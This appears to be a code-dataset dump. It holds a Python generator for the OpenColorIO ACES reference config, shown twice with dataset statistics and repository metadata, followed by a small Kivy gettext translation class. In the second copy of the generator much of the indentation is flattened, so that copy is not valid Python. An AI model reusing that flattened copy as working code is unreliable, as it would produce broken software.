                assert (style in builtin_transforms), (
                    f'"{style}" "BuiltinTransform" style does not '
                    f'exist!')
            # Finding the "CTLTransform" class instance that matches given
            # "ACEStransformID", if it does not exist, there is a critical
            # mismatch in the mapping with *aces-dev*.
            aces_transform_id = transform_data['aces_transform_id']
            filtered_ctl_transforms = [
                ctl_transform for ctl_transform in ctl_transforms
                if ctl_transform.aces_transform_id.aces_transform_id ==
                aces_transform_id
            ]
            ctl_transform = next(iter(filtered_ctl_transforms), None)
            assert ctl_transform is not None, (
                f'"aces-dev" has no transform with "{aces_transform_id}" '
                f'ACEStransformID, please cross-check the '
                f'"{config_mapping_file_path}" config mapping file and '
                f'the "aces-dev" "CTL" transforms!')
            transform_data['ctl_transform'] = ctl_transform
            config_mapping[transform_data['builtin_transform_style']].append(
                transform_data)
    colorspaces = []
    looks = []
    displays, display_names = [], []
    view_transforms, view_transform_names = [], []
    shared_views = []
    # Seeding the config with the scene reference, display connection and
    # utility colorspaces.
    aces_family_prefix = 'CSC' if analytical else 'ACES'
    scene_reference_colorspace = colorspace_factory(
        f'{aces_family_prefix} - {ACES_CONFIG_REFERENCE_COLORSPACE}',
        'ACES',
        description=(
            'The "Academy Color Encoding System" reference colorspace.'),
        encoding='scene-linear')
    display_reference_colorspace = colorspace_factory(
        'CIE-XYZ-D65',
        description='The "CIE XYZ (D65)" display connection colorspace.',
        reference_space=ocio.REFERENCE_SPACE_DISPLAY)
    raw_colorspace = colorspace_factory(
        'Utility - Raw',
        'Utility',
        description='The utility "Raw" colorspace.',
        is_data=True)
    colorspaces += [
        scene_reference_colorspace,
        display_reference_colorspace,
        raw_colorspace,
    ]
    # Mapping every "BuiltinTransform" style to a view transform with its
    # linked display colorspaces, a look, or a regular colorspace, depending
    # on the "interface" column of the mapping file.
    for style, transforms_data in config_mapping.items():
        if transforms_data[0]['interface'] == 'ViewTransform':
            view_transform = style_to_view_transform(style, [
                transform_data['ctl_transform']
                for transform_data in transforms_data
            ], describe)
            view_transforms.append(view_transform)
            view_transform_name = view_transform.getName()
            view_transform_names.append(view_transform_name)
            for transform_data in transforms_data:
                display_style = transform_data[
                    'linked_display_colorspace_style']
                display = style_to_display_colorspace(
                    display_style,
                    encoding=transform_data.get('encoding'),
                    categories=transform_data.get('categories'))
                display_name = display.getName()
                # A display may be linked by several view transforms, only
                # register it once.
                if display_name not in display_names:
                    displays.append(display)
                    display_names.append(display_name)
                shared_views.append({
                    'display': display_name,
                    'view': view_transform_name,
                    'view_transform': view_transform_name,
                })
        else:
            for transform_data in transforms_data:
                ctl_transform = transform_data['ctl_transform']
                if transform_data['interface'] == 'Look':
                    look = ctl_transform_to_look(
                        ctl_transform,
                        describe,
                        analytical=analytical,
                        forward_transform=create_builtin_transform(style),
                        process_space=scene_reference_colorspace.getName(),
                    )
                    looks.append(look)
                else:
                    colorspace = ctl_transform_to_colorspace(
                        ctl_transform,
                        describe,
                        analytical=analytical,
                        to_reference=create_builtin_transform(style),
                        encoding=transform_data.get('encoding'),
                        categories=transform_data.get('categories'))
                    colorspaces.append(colorspace)
    # Default view transform that bypasses tone-mapping, shared by every
    # display.
    untonemapped_view_transform = view_transform_factory(
        'Un-tone-mapped',
        from_reference=ocio.BuiltinTransform(
            'UTILITY - ACES-AP0_to_CIE-XYZ-D65_BFD'),
    )
    untonemapped_view_transform_name = untonemapped_view_transform.getName()
    for display in display_names:
        shared_views.append({
            'display': display,
            'view': untonemapped_view_transform_name,
            'view_transform': untonemapped_view_transform_name,
        })
    # Assembling the config data: roles, colorspaces, looks, views and file
    # rules, then generating (and optionally writing and validating) the
    # config itself.
    data = ConfigData(
        description=(
            f'The "Academy Color Encoding System" (ACES) "Reference Config".'
            f'\n\n'
            f'This "OpenColorIO" config is a strict and quasi-analytical '
            f'implementation of "aces-dev" and is designed as a reference for '
            f'software developers. It is not a replacement for the previous '
            f'"ACES" configs nor the "ACES Studio Config".'
            f'\n\n'
            f'Generated with "OpenColorIO-Config-ACES" {git_describe()} '
            f'on the {datetime.now().strftime("%Y/%m/%d at %H:%M")}.'),
        roles={
            ocio.ROLE_COLOR_TIMING: f'{aces_family_prefix} - ACEScct',
            ocio.ROLE_COMPOSITING_LOG: f'{aces_family_prefix} - ACEScct',
            ocio.ROLE_DATA: 'Utility - Raw',
            ocio.ROLE_DEFAULT: scene_reference_colorspace.getName(),
            ocio.ROLE_INTERCHANGE_DISPLAY:
            display_reference_colorspace.getName(),
            ocio.ROLE_INTERCHANGE_SCENE: scene_reference_colorspace.getName(),
            ocio.ROLE_REFERENCE: scene_reference_colorspace.getName(),
            ocio.ROLE_RENDERING: f'{aces_family_prefix} - ACEScg',
            ocio.ROLE_SCENE_LINEAR: f'{aces_family_prefix} - ACEScg',
        },
        colorspaces=colorspaces + displays,
        looks=looks,
        view_transforms=view_transforms + [untonemapped_view_transform],
        shared_views=shared_views,
        views=shared_views + [{
            'display': display,
            'view': 'Raw',
            'colorspace': 'Utility - Raw'
        } for display in display_names],
        active_displays=display_names,
        active_views=view_transform_names + ['Raw'],
        file_rules=[{
            'name': 'Default',
            'colorspace': scene_reference_colorspace.getName()
        }],
        inactive_colorspaces=['CIE-XYZ-D65'],
        default_view_transform=untonemapped_view_transform.getName(),
        profile_version=2)
    config = generate_config(data, config_name, validate)
    if additional_data:
        return config, data
    else:
        return config
if __name__ == '__main__':
    import os
    import opencolorio_config_aces

    # Emitting the generation progress at "INFO" level.
    logging.basicConfig()
    logging.getLogger().setLevel(logging.INFO)

    # The config is written to a "build" directory sibling to the package.
    build_directory = os.path.join(opencolorio_config_aces.__path__[0], '..',
                                   'build')
    if not os.path.exists(build_directory):
        os.makedirs(build_directory)
    config, data = generate_config_aces(
        config_name=os.path.join(build_directory,
                                 'config-aces-reference.ocio'),
        analytical=False,
        additional_data=True)
| 31.766234 | 79 | 0.634096 |
import csv
import logging
import re
from collections import defaultdict
from datetime import datetime
from enum import Flag, auto
from pathlib import Path
from opencolorio_config_aces.config.generation import (
ConfigData, colorspace_factory, generate_config, look_factory,
view_transform_factory)
from opencolorio_config_aces.config.reference import (
classify_aces_ctl_transforms, discover_aces_ctl_transforms,
unclassify_ctl_transforms)
from opencolorio_config_aces.utilities import git_describe, required
__author__ = 'OpenColorIO Contributors'
__copyright__ = 'Copyright Contributors to the OpenColorIO Project.'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'OpenColorIO Contributors'
__email__ = 'ocio-dev@lists.aswf.io'
__status__ = 'Production'
__all__ = [
'ACES_CONFIG_REFERENCE_MAPPING_FILE_PATH',
'ACES_CONFIG_REFERENCE_COLORSPACE',
'ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE',
'ACES_CONFIG_COLORSPACE_NAME_SEPARATOR',
'ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR',
'ACES_CONFIG_BUILTIN_TRANSFORM_NAME_SEPARATOR',
'ACES_CONFIG_DISPLAY_FAMILY', 'COLORSPACE_NAME_SUBSTITUTION_PATTERNS',
'LOOK_NAME_SUBSTITUTION_PATTERNS',
'TRANSFORM_FAMILY_SUBSTITUTION_PATTERNS',
'VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS',
'DISPLAY_NAME_SUBSTITUTION_PATTERNS', 'ColorspaceDescriptionStyle',
'beautify_name', 'beautify_colorspace_name', 'beautify_look_name',
'beautify_transform_family', 'beautify_view_transform_name',
'beautify_display_name', 'ctl_transform_to_colorspace_name',
'ctl_transform_to_look_name', 'ctl_transform_to_transform_family',
'ctl_transform_to_description', 'ctl_transform_to_colorspace',
'ctl_transform_to_look', 'create_builtin_transform',
'style_to_view_transform', 'style_to_display_colorspace',
'generate_config_aces'
]
ACES_CONFIG_REFERENCE_MAPPING_FILE_PATH = (
Path(__file__).parents[0] / 'resources' /
'OpenColorIO-ACES-Config Transforms - Reference Config - Mapping.csv')
ACES_CONFIG_REFERENCE_COLORSPACE = 'ACES2065-1'
ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE = 'OCES'
ACES_CONFIG_COLORSPACE_NAME_SEPARATOR = ' - '
ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR = '/'
ACES_CONFIG_BUILTIN_TRANSFORM_NAME_SEPARATOR = '_to_'
ACES_CONFIG_DISPLAY_FAMILY = 'Display'
COLORSPACE_NAME_SUBSTITUTION_PATTERNS = {
'ACES_0_1_1': 'ACES 0.1.1',
'ACES_0_2_2': 'ACES 0.2.2',
'ACES_0_7_1': 'ACES 0.7.1',
'_7nits': '',
'_15nits': '',
'_': ' ',
'-raw': '',
'-': ' ',
'\\b(\\w+)limited\\b': '(\\1 Limited)',
'\\b(\\d+)nits\\b': '(\\1 nits)',
'RGBmonitor': 'sRGB',
'Rec709': 'Rec. 709',
'Rec2020': 'Rec. 2020',
}
COLORSPACE_NAME_SUBSTITUTION_PATTERNS.update({
(f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}Alexa'
f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}v\\d+'
f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}.*'):
'',
f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}':
ACES_CONFIG_COLORSPACE_NAME_SEPARATOR,
})
LOOK_NAME_SUBSTITUTION_PATTERNS = {
'BlueLightArtifactFix': 'Blue Light Artifact Fix'
}
TRANSFORM_FAMILY_SUBSTITUTION_PATTERNS = {
'\\\\': ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR,
'vendorSupplied[/\\\\]': '',
'arri': 'ARRI',
'alexa': 'Alexa',
'canon': 'Canon',
'panasonic': 'Panasonic',
'red': 'RED',
'sony': 'Sony',
}
VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS = {
'7.2nit': '&',
'15nit': '&',
'lim': ' lim',
'nit': ' nits',
'sim': ' sim on',
'CINEMA': 'Cinema',
'VIDEO': 'Video',
'REC1886': 'Rec.1886',
'REC709': 'Rec.709',
'REC2020': 'Rec.2020',
'-': ' ',
}
DISPLAY_NAME_SUBSTITUTION_PATTERNS = {
'G2.6-': '',
'-BFD': '',
'REC.1886': 'Rec.1886',
'REC.709': 'Rec.709 Video',
'REC.2020': 'Rec.2020 Video',
'REC.2100': 'Rec.2100',
'-Rec.': ' / Rec.',
'-1000nit': '',
'dcdm': 'DCDM',
'p3': 'P3',
'rec709': 'Rec. 709',
'rec2020': 'Rec. 2020',
}
class ColorspaceDescriptionStyle(Flag):
    """
    Enum storing the various *OpenColorIO* colorspace description styles.
    """

    NONE = auto()
    ACES = auto()
    OPENCOLORIO = auto()
    SHORT = auto()
    LONG = auto()
    # Composite styles combining the individual flags above.
    SHORT_UNION = ACES | OPENCOLORIO | SHORT
    LONG_UNION = ACES | OPENCOLORIO | LONG
def beautify_name(name, patterns):
    """
    Beautifies given name by applying in succession the given substitution
    patterns.

    Parameters
    ----------
    name : unicode
        Name to beautify.
    patterns : dict
        Mapping of regex patterns to their substitutions, applied in
        insertion order.

    Returns
    -------
    unicode
        Beautified, whitespace-stripped name.
    """

    beautified = name
    for pattern, replacement in patterns.items():
        beautified = re.sub(pattern, replacement, beautified)

    return beautified.strip()
def beautify_colorspace_name(name):
    """
    Beautifies given *OpenColorIO* colorspace name.
    """

    return beautify_name(name, COLORSPACE_NAME_SUBSTITUTION_PATTERNS)
def beautify_look_name(name):
    """
    Beautifies given *OpenColorIO* look name.
    """

    return beautify_name(name, LOOK_NAME_SUBSTITUTION_PATTERNS)
def beautify_transform_family(name):
    """
    Beautifies given *OpenColorIO* transform family.
    """

    return beautify_name(name, TRANSFORM_FAMILY_SUBSTITUTION_PATTERNS)
def beautify_view_transform_name(name):
    """
    Beautifies given *OpenColorIO* view transform name.
    """

    # The style name ends with "<basename>_<version>" after the last
    # separator, e.g. splitting out the trailing version token.
    basename, version = name.split(ACES_CONFIG_COLORSPACE_NAME_SEPARATOR)[
        -1].split('_')

    # With more than two "-" separated tokens, the first two form the family
    # and the remainder the genus; otherwise there is no genus.
    tokens = basename.split('-')
    family, genus = (['-'.join(tokens[:2]), '-'.join(tokens[2:])]
                     if len(tokens) > 2 else [basename, None])

    family = beautify_name(family, VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS)
    genus = (beautify_name(genus, VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS)
             if genus is not None else genus)

    return (f'Output - {family} ({genus}) - ACES {version}'
            if genus is not None else f'Output - {family} - ACES {version}')
def beautify_display_name(name):
    """
    Beautifies given *OpenColorIO* display name.
    """

    # Only the part after the trailing "_to_" separator names the display.
    basename = name.split(ACES_CONFIG_BUILTIN_TRANSFORM_NAME_SEPARATOR)[-1]
    name = beautify_name(basename, DISPLAY_NAME_SUBSTITUTION_PATTERNS)
    return f'Display - {name}'
def ctl_transform_to_colorspace_name(ctl_transform):
    """
    Generates the *OpenColorIO* colorspace name for given *ACES* *CTL*
    transform.
    """

    # The colorspace is named after whichever end of the transform is not
    # the "ACES2065-1" / "OCES" reference.
    if ctl_transform.source in (ACES_CONFIG_REFERENCE_COLORSPACE,
                                ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE):
        name = ctl_transform.target
    else:
        name = ctl_transform.source
    return beautify_colorspace_name(name)
def ctl_transform_to_look_name(ctl_transform):
    """
    Generates the *OpenColorIO* look name for given *ACES* *CTL* transform.
    """

    # The look is named after whichever end of the transform is not the
    # "ACES2065-1" / "OCES" reference.
    if ctl_transform.source in (ACES_CONFIG_REFERENCE_COLORSPACE,
                                ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE):
        name = ctl_transform.target
    else:
        name = ctl_transform.source
    return beautify_look_name(name)
def ctl_transform_to_transform_family(ctl_transform, analytical=True):
    """
    Generates the *OpenColorIO* transform family for given *ACES* *CTL*
    transform.

    Parameters
    ----------
    ctl_transform : CTLTransform
        *ACES* *CTL* transform to generate the *OpenColorIO* transform
        family for.
    analytical : bool, optional
        Whether to generate the family that analytically matches the given
        *ACES* *CTL* transform, i.e. true to the *aces-dev* reference but not
        necessarily user friendly.

    Returns
    -------
    unicode
        *OpenColorIO* transform family.

    Raises
    ------
    ValueError
        If the *ACES* *CTL* transform family is not supported.
    """

    if analytical:
        if (ctl_transform.family == 'csc'
                and ctl_transform.namespace == 'Academy'):
            family = 'CSC'
        elif ctl_transform.family == 'input_transform':
            family = (f'Input{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}'
                      f'{ctl_transform.genus}')
        elif ctl_transform.family == 'output_transform':
            family = 'Output'
        elif ctl_transform.family == 'lmt':
            family = 'LMT'
        else:
            # Previously, an unhandled family fell through and raised an
            # opaque "UnboundLocalError"; fail with an explicit error instead.
            raise ValueError(
                f'"{ctl_transform.family}" family is not supported!')
    else:
        if (ctl_transform.family == 'csc'
                and ctl_transform.namespace == 'Academy'):
            # "ACES" and "ADX" colorspace conversions are grouped under the
            # "ACES" family, the others under "Input/<genus>".
            if re.match('ACES|ADX', ctl_transform.name):
                family = 'ACES'
            else:
                family = (f'Input{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}'
                          f'{ctl_transform.genus}')
        elif ctl_transform.family == 'input_transform':
            family = (f'Input{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}'
                      f'{ctl_transform.genus}')
        elif ctl_transform.family == 'output_transform':
            family = 'Output'
        elif ctl_transform.family == 'lmt':
            family = 'LMT'
        else:
            raise ValueError(
                f'"{ctl_transform.family}" family is not supported!')

    return beautify_transform_family(family)
@required('OpenColorIO')
def ctl_transform_to_description(
ctl_transform,
describe=ColorspaceDescriptionStyle.LONG_UNION,
factory=colorspace_factory,
**kwargs):
import PyOpenColorIO as ocio
description = None
if describe != ColorspaceDescriptionStyle.NONE:
description = []
if describe in (ColorspaceDescriptionStyle.OPENCOLORIO,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
forward, inverse = ([
'to_reference',
'from_reference',
] if factory is colorspace_factory else [
'forward_transform',
'inverse_transform',
])
transforms = [
transform for transform in (kwargs.get(forward),
kwargs.get(inverse))
if transform is not None
]
transform = next(iter(transforms), None)
if isinstance(transform, ocio.BuiltinTransform):
description.append(transform.getDescription())
if describe in (ColorspaceDescriptionStyle.ACES,
ColorspaceDescriptionStyle.ACES
| ColorspaceDescriptionStyle.SHORT,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
if len(description) > 0:
description.append('')
aces_transform_id = (
ctl_transform.aces_transform_id.aces_transform_id)
if describe in (ColorspaceDescriptionStyle.ACES,
ColorspaceDescriptionStyle.ACES
| ColorspaceDescriptionStyle.SHORT,
ColorspaceDescriptionStyle.SHORT_UNION):
description.append(f'ACEStransformID: {aces_transform_id}')
else:
description.append('CTL Transform')
description.append(f'{"=" * len(description[-1])}\n')
description.append(f'{ctl_transform.description}\n')
description.append(f'ACEStransformID: {aces_transform_id}')
description = '\n'.join(description)
return description
def ctl_transform_to_colorspace(ctl_transform,
                                describe=ColorspaceDescriptionStyle.LONG_UNION,
                                analytical=True,
                                **kwargs):
    """
    Generates the *OpenColorIO* colorspace for given *ACES* *CTL* transform.

    Keyword arguments are forwarded to
    :func:`opencolorio_config_aces.colorspace_factory` and take precedence
    over the generated "name", "family" and "description" settings.
    """

    name = ctl_transform_to_colorspace_name(ctl_transform)
    family = ctl_transform_to_transform_family(ctl_transform, analytical)
    description = ctl_transform_to_description(ctl_transform, describe,
                                               colorspace_factory, **kwargs)
    # The colorspace name is prefixed with its beautified family.
    settings = {
        'name': (f'{beautify_colorspace_name(family)}'
                 f'{ACES_CONFIG_COLORSPACE_NAME_SEPARATOR}'
                 f'{name}'),
        'family':
        family,
        'description':
        description,
    }
    settings.update(kwargs)
    colorspace = colorspace_factory(**settings)
    return colorspace
def ctl_transform_to_look(ctl_transform,
                          describe=ColorspaceDescriptionStyle.LONG_UNION,
                          analytical=True,
                          **kwargs):
    """
    Generates the *OpenColorIO* look for given *ACES* *CTL* transform.

    Keyword arguments are forwarded to
    :func:`opencolorio_config_aces.look_factory` and take precedence over the
    generated "name" and "description" settings.
    """

    name = ctl_transform_to_look_name(ctl_transform)
    family = ctl_transform_to_transform_family(ctl_transform, analytical)
    description = ctl_transform_to_description(ctl_transform, describe,
                                               look_factory, **kwargs)
    # The look name is prefixed with its beautified family.
    settings = {
        'name': (f'{beautify_colorspace_name(family)}'
                 f'{ACES_CONFIG_COLORSPACE_NAME_SEPARATOR}'
                 f'{name}'),
        'description':
        description,
    }
    settings.update(kwargs)
    look = look_factory(**settings)
    return look
@required('OpenColorIO')
def create_builtin_transform(style):
    """
    Creates an *OpenColorIO* builtin transform for given style.

    If the style does not exist, a placeholder "FileTransform" whose source
    is set to the style is returned instead.

    Parameters
    ----------
    style : unicode
        *OpenColorIO* builtin transform style

    Returns
    -------
    BuiltinTransform
        *OpenColorIO* builtin transform for given style.
    """

    import PyOpenColorIO as ocio

    builtin_transform = ocio.BuiltinTransform()
    try:
        builtin_transform.setStyle(style)
    except ocio.Exception:
        # Lazy "%s" interpolation so the message is only formatted when the
        # warning record is actually emitted.
        logging.warning(
            '%s style is not defined, '
            'using a placeholder "FileTransform" instead!', style)
        builtin_transform = ocio.FileTransform()
        builtin_transform.setSrc(style)
    return builtin_transform
@required('OpenColorIO')
def style_to_view_transform(style,
ctl_transforms,
describe=ColorspaceDescriptionStyle.LONG_UNION):
import PyOpenColorIO as ocio
name = beautify_view_transform_name(style)
builtin_transform = ocio.BuiltinTransform(style)
description = None
if describe != ColorspaceDescriptionStyle.NONE:
description = []
if describe in (ColorspaceDescriptionStyle.OPENCOLORIO,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
description.append(builtin_transform.getDescription())
if describe in (ColorspaceDescriptionStyle.ACES,
ColorspaceDescriptionStyle.ACES
| ColorspaceDescriptionStyle.SHORT,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
aces_transform_ids, aces_descriptions = zip(
*[(ctl_transform.aces_transform_id.aces_transform_id,
ctl_transform.description)
for ctl_transform in ctl_transforms])
if len(description) > 0:
description.append('')
if describe in (ColorspaceDescriptionStyle.ACES
| ColorspaceDescriptionStyle.SHORT,
ColorspaceDescriptionStyle.SHORT_UNION):
description.extend([
f'ACEStransformID: {aces_transform_id}'
for aces_transform_id in aces_transform_ids
])
else:
description.append(
f'CTL Transform'
f'{"s" if len(aces_transform_ids) >= 2 else ""}')
description.append(f'{"=" * len(description[-1])}\n')
description.append(f'\n{"-" * 80}\n\n'.join([
(f'{aces_descriptions[i]}\n\n'
f'ACEStransformID: {aces_transform_id}\n')
for i, aces_transform_id in enumerate(aces_transform_ids)
]))
description = '\n'.join(description)
view_transform = view_transform_factory(
name, from_reference=builtin_transform, description=description)
return view_transform
@required('OpenColorIO')
def style_to_display_colorspace(
style, describe=ColorspaceDescriptionStyle.OPENCOLORIO, **kwargs):
import PyOpenColorIO as ocio
kwargs.setdefault('family', ACES_CONFIG_DISPLAY_FAMILY)
name = beautify_display_name(style)
builtin_transform = ocio.BuiltinTransform(style)
description = None
if describe != ColorspaceDescriptionStyle.NONE:
description = []
if describe in (ColorspaceDescriptionStyle.OPENCOLORIO,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
description.append(builtin_transform.getDescription())
description = '\n'.join(description)
settings = {
'name': name,
'family': ACES_CONFIG_DISPLAY_FAMILY,
'description': description,
'from_reference': builtin_transform,
'reference_space': ocio.REFERENCE_SPACE_DISPLAY,
}
settings.update(kwargs)
colorspace = colorspace_factory(**settings)
return colorspace
@required('OpenColorIO')
def generate_config_aces(
config_name=None,
validate=True,
describe=ColorspaceDescriptionStyle.SHORT_UNION,
config_mapping_file_path=ACES_CONFIG_REFERENCE_MAPPING_FILE_PATH,
analytical=True,
additional_data=False):
import PyOpenColorIO as ocio
ctl_transforms = unclassify_ctl_transforms(
classify_aces_ctl_transforms(discover_aces_ctl_transforms()))
builtin_transforms = [
builtin for builtin in ocio.BuiltinTransformRegistry()
]
config_mapping = defaultdict(list)
with open(config_mapping_file_path) as csv_file:
dict_reader = csv.DictReader(
csv_file,
delimiter=',',
fieldnames=[
'ordering',
'aces_transform_id',
'builtin_transform_style',
'linked_display_colorspace_style',
'interface',
'encoding',
'categories',
])
next(dict_reader)
for transform_data in dict_reader:
style = transform_data['builtin_transform_style']
if style:
assert (style in builtin_transforms), (
f'"{style}" "BuiltinTransform" style does not '
f'exist!')
style = transform_data['linked_display_colorspace_style']
if style:
assert (style in builtin_transforms), (
f'"{style}" "BuiltinTransform" style does not '
f'exist!')
aces_transform_id = transform_data['aces_transform_id']
filtered_ctl_transforms = [
ctl_transform for ctl_transform in ctl_transforms
if ctl_transform.aces_transform_id.aces_transform_id ==
aces_transform_id
]
ctl_transform = next(iter(filtered_ctl_transforms), None)
assert ctl_transform is not None, (
f'"aces-dev" has no transform with "{aces_transform_id}" '
f'ACEStransformID, please cross-check the '
f'"{config_mapping_file_path}" config mapping file and '
f'the "aces-dev" "CTL" transforms!')
transform_data['ctl_transform'] = ctl_transform
config_mapping[transform_data['builtin_transform_style']].append(
transform_data)
colorspaces = []
looks = []
displays, display_names = [], []
view_transforms, view_transform_names = [], []
shared_views = []
aces_family_prefix = 'CSC' if analytical else 'ACES'
scene_reference_colorspace = colorspace_factory(
f'{aces_family_prefix} - {ACES_CONFIG_REFERENCE_COLORSPACE}',
'ACES',
description=(
'The "Academy Color Encoding System" reference colorspace.'),
encoding='scene-linear')
display_reference_colorspace = colorspace_factory(
'CIE-XYZ-D65',
description='The "CIE XYZ (D65)" display connection colorspace.',
reference_space=ocio.REFERENCE_SPACE_DISPLAY)
raw_colorspace = colorspace_factory(
'Utility - Raw',
'Utility',
description='The utility "Raw" colorspace.',
is_data=True)
colorspaces += [
scene_reference_colorspace,
display_reference_colorspace,
raw_colorspace,
]
for style, transforms_data in config_mapping.items():
if transforms_data[0]['interface'] == 'ViewTransform':
view_transform = style_to_view_transform(style, [
transform_data['ctl_transform']
for transform_data in transforms_data
], describe)
view_transforms.append(view_transform)
view_transform_name = view_transform.getName()
view_transform_names.append(view_transform_name)
for transform_data in transforms_data:
display_style = transform_data[
'linked_display_colorspace_style']
display = style_to_display_colorspace(
display_style,
encoding=transform_data.get('encoding'),
categories=transform_data.get('categories'))
display_name = display.getName()
if display_name not in display_names:
displays.append(display)
display_names.append(display_name)
shared_views.append({
'display': display_name,
'view': view_transform_name,
'view_transform': view_transform_name,
})
else:
for transform_data in transforms_data:
ctl_transform = transform_data['ctl_transform']
if transform_data['interface'] == 'Look':
look = ctl_transform_to_look(
ctl_transform,
describe,
analytical=analytical,
forward_transform=create_builtin_transform(style),
process_space=scene_reference_colorspace.getName(),
)
looks.append(look)
else:
colorspace = ctl_transform_to_colorspace(
ctl_transform,
describe,
analytical=analytical,
to_reference=create_builtin_transform(style),
encoding=transform_data.get('encoding'),
categories=transform_data.get('categories'))
colorspaces.append(colorspace)
untonemapped_view_transform = view_transform_factory(
'Un-tone-mapped',
from_reference=ocio.BuiltinTransform(
'UTILITY - ACES-AP0_to_CIE-XYZ-D65_BFD'),
)
untonemapped_view_transform_name = untonemapped_view_transform.getName()
for display in display_names:
shared_views.append({
'display': display,
'view': untonemapped_view_transform_name,
'view_transform': untonemapped_view_transform_name,
})
data = ConfigData(
description=(
f'The "Academy Color Encoding System" (ACES) "Reference Config".'
f'\n\n'
f'This "OpenColorIO" config is a strict and quasi-analytical '
f'implementation of "aces-dev" and is designed as a reference for '
f'software developers. It is not a replacement for the previous '
f'"ACES" configs nor the "ACES Studio Config".'
f'\n\n'
f'Generated with "OpenColorIO-Config-ACES" {git_describe()} '
f'on the {datetime.now().strftime("%Y/%m/%d at %H:%M")}.'),
roles={
ocio.ROLE_COLOR_TIMING: f'{aces_family_prefix} - ACEScct',
ocio.ROLE_COMPOSITING_LOG: f'{aces_family_prefix} - ACEScct',
ocio.ROLE_DATA: 'Utility - Raw',
ocio.ROLE_DEFAULT: scene_reference_colorspace.getName(),
ocio.ROLE_INTERCHANGE_DISPLAY:
display_reference_colorspace.getName(),
ocio.ROLE_INTERCHANGE_SCENE: scene_reference_colorspace.getName(),
ocio.ROLE_REFERENCE: scene_reference_colorspace.getName(),
ocio.ROLE_RENDERING: f'{aces_family_prefix} - ACEScg',
ocio.ROLE_SCENE_LINEAR: f'{aces_family_prefix} - ACEScg',
},
colorspaces=colorspaces + displays,
looks=looks,
view_transforms=view_transforms + [untonemapped_view_transform],
shared_views=shared_views,
views=shared_views + [{
'display': display,
'view': 'Raw',
'colorspace': 'Utility - Raw'
} for display in display_names],
active_displays=display_names,
active_views=view_transform_names + ['Raw'],
file_rules=[{
'name': 'Default',
'colorspace': scene_reference_colorspace.getName()
}],
inactive_colorspaces=['CIE-XYZ-D65'],
default_view_transform=untonemapped_view_transform.getName(),
profile_version=2)
config = generate_config(data, config_name, validate)
if additional_data:
return config, data
else:
return config
if __name__ == '__main__':
    import os
    import opencolorio_config_aces

    # Emitting the generation progress at "INFO" level.
    logging.basicConfig()
    logging.getLogger().setLevel(logging.INFO)

    # The config is written to a "build" directory sibling to the package.
    build_directory = os.path.join(opencolorio_config_aces.__path__[0], '..',
                                   'build')
    if not os.path.exists(build_directory):
        os.makedirs(build_directory)
    config, data = generate_config_aces(
        config_name=os.path.join(build_directory,
                                 'config-aces-reference.ocio'),
        analytical=False,
        additional_data=True)
| true | true |
f710006f30293d1e950a819440eba24d7dbe294e | 1,359 | py | Python | src/kv_classes/lang.py | Mulugruntz/deep_3d_photo | e296343757b5715145d49f283732821ef7915472 | [
"MIT"
] | 7 | 2020-07-22T07:35:15.000Z | 2021-12-29T13:46:31.000Z | src/kv_classes/lang.py | Mulugruntz/deep_3d_photo | e296343757b5715145d49f283732821ef7915472 | [
"MIT"
] | 2 | 2021-04-01T10:39:14.000Z | 2021-12-29T14:06:04.000Z | src/kv_classes/lang.py | Mulugruntz/deep_3d_photo | e296343757b5715145d49f283732821ef7915472 | [
"MIT"
] | null | null | null | from kivy.lang import Observable
import gettext
from constants import LOCALE_DIR
class Lang(Observable):
    """Observable gettext wrapper for kv translations.

    Call the instance like a function (``_("text")``) to translate a
    string.  kv rules that bind to the pseudo-property ``"_"`` are
    recorded here and re-triggered by :meth:`switch_lang`, so translated
    labels refresh when the language changes.
    """

    # Class-level (shared) state: every instance appends to the same
    # observer list, matching the original single-instance usage.
    observers = []
    lang = None

    def __init__(self, defaultlang, transalte=None):
        # NOTE(review): 'transalte' is a typo for 'translate'; kept so
        # keyword callers remain compatible.
        super().__init__()
        self.ugettext = None
        self.lang = defaultlang
        if transalte is None:
            self._translate = gettext.gettext
        else:
            self._translate = transalte
        self.switch_lang(self.lang)

    def __call__(self, text):
        """Translate *text* with the currently configured function."""
        return self._translate(text)

    def fbind(self, name, func, *largs, **kwargs):
        # Intercept only the "_" pseudo-property; everything else goes to
        # the regular Observable binding machinery.
        if name != "_":
            return super().fbind(name, func, *largs, **kwargs)
        self.observers.append((func, largs, kwargs))

    def funbind(self, name, func, *largs, **kwargs):
        if name != "_":
            return super().funbind(name, func, *largs, **kwargs)
        entry = (func, largs, kwargs)
        if entry in self.observers:
            self.observers.remove(entry)

    def switch_lang(self, lang):
        """Load the catalog for *lang* and re-fire all "_" observers."""
        catalog = gettext.translation('Deep3DPhoto', LOCALE_DIR,
                                      languages=[lang])
        self.ugettext = catalog.gettext
        # Re-evaluate every kv rule attached to the "_" binding.
        for callback, largs, kwargs in self.observers:
            callback(largs, None, None)
| 31.604651 | 82 | 0.617366 | from kivy.lang import Observable
import gettext
